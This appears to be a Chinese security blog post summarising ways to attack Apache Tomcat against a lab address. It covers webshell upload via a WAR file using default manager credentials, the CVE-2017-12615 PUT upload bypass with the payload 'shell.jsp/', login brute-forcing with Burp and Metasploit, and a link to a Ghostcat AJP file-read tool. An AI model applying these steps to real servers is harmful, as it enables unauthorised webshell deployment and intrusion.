一、后台war包getshell

  漏洞利用:

  tomcat在conf/tomcat-users.xml配置用户权限

<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">

    <role rolename="manager-gui"/>
    <role rolename="manager-script"/>
    <role rolename="manager-jmx"/>
    <role rolename="manager-status"/>
    <role rolename="admin-gui"/>
    <role rolename="admin-script"/>
    <user username="tomcat" password="tomcat" roles="manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script" />
    
</tomcat-users>

  

  1、构建war包  

  jar cvf shell.war test.jsp

   tomcat漏洞利用总结-风君雪科技博客

  

  2、后台页面上传tomcat自动解压war包

  http://172.16.20.134:8080/manager/html

  tomcat漏洞利用总结-风君雪科技博客

  3、cknife连接getshell

  http://172.16.20.134:8080/shell/test.jsp

  tomcat漏洞利用总结-风君雪科技博客

二、tomcat任意上传漏洞CVE-2017–12615

  漏洞利用: 

   conf/web.xml处理.jsp 和 .jspx 的时候,是通过JspServlet处理请求的,当.jsp后面有空格的时候交给defaultServlet处理

  影响windows linux

  

  1、访问域名抓包

  payload:

  shell.jsp/

  put上传shell.jsp/ 绕过windows,linux。

  tomcat漏洞利用总结-风君雪科技博客

  

  2、访问域名http://172.16.20.134:8080/test.jsp getshell

  tomcat漏洞利用总结-风君雪科技博客

三、后台爆破

  1、后台base64编码传输

  抓包 

  tomcat漏洞利用总结-风君雪科技博客

  字段解密为:

  tomcat漏洞利用总结-风君雪科技博客

  payload选择custom itrerator

  tomcat漏洞利用总结-风君雪科技博客

  tomcat漏洞利用总结-风君雪科技博客

  tomcat漏洞利用总结-风君雪科技博客

  tomcat漏洞利用总结-风君雪科技博客

  选择base64编码

  tomcat漏洞利用总结-风君雪科技博客

  点这爆破

  tomcat漏洞利用总结-风君雪科技博客

  msf爆破search tomcat_mgr_login

 四.CNVD-2020-10487-Tomcat-Ajp-lfi

Tomcat-Ajp协议文件读取漏洞

工具地址:https://github.com/AdministratorGithub/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py

tomcat漏洞利用总结-风君雪科技博客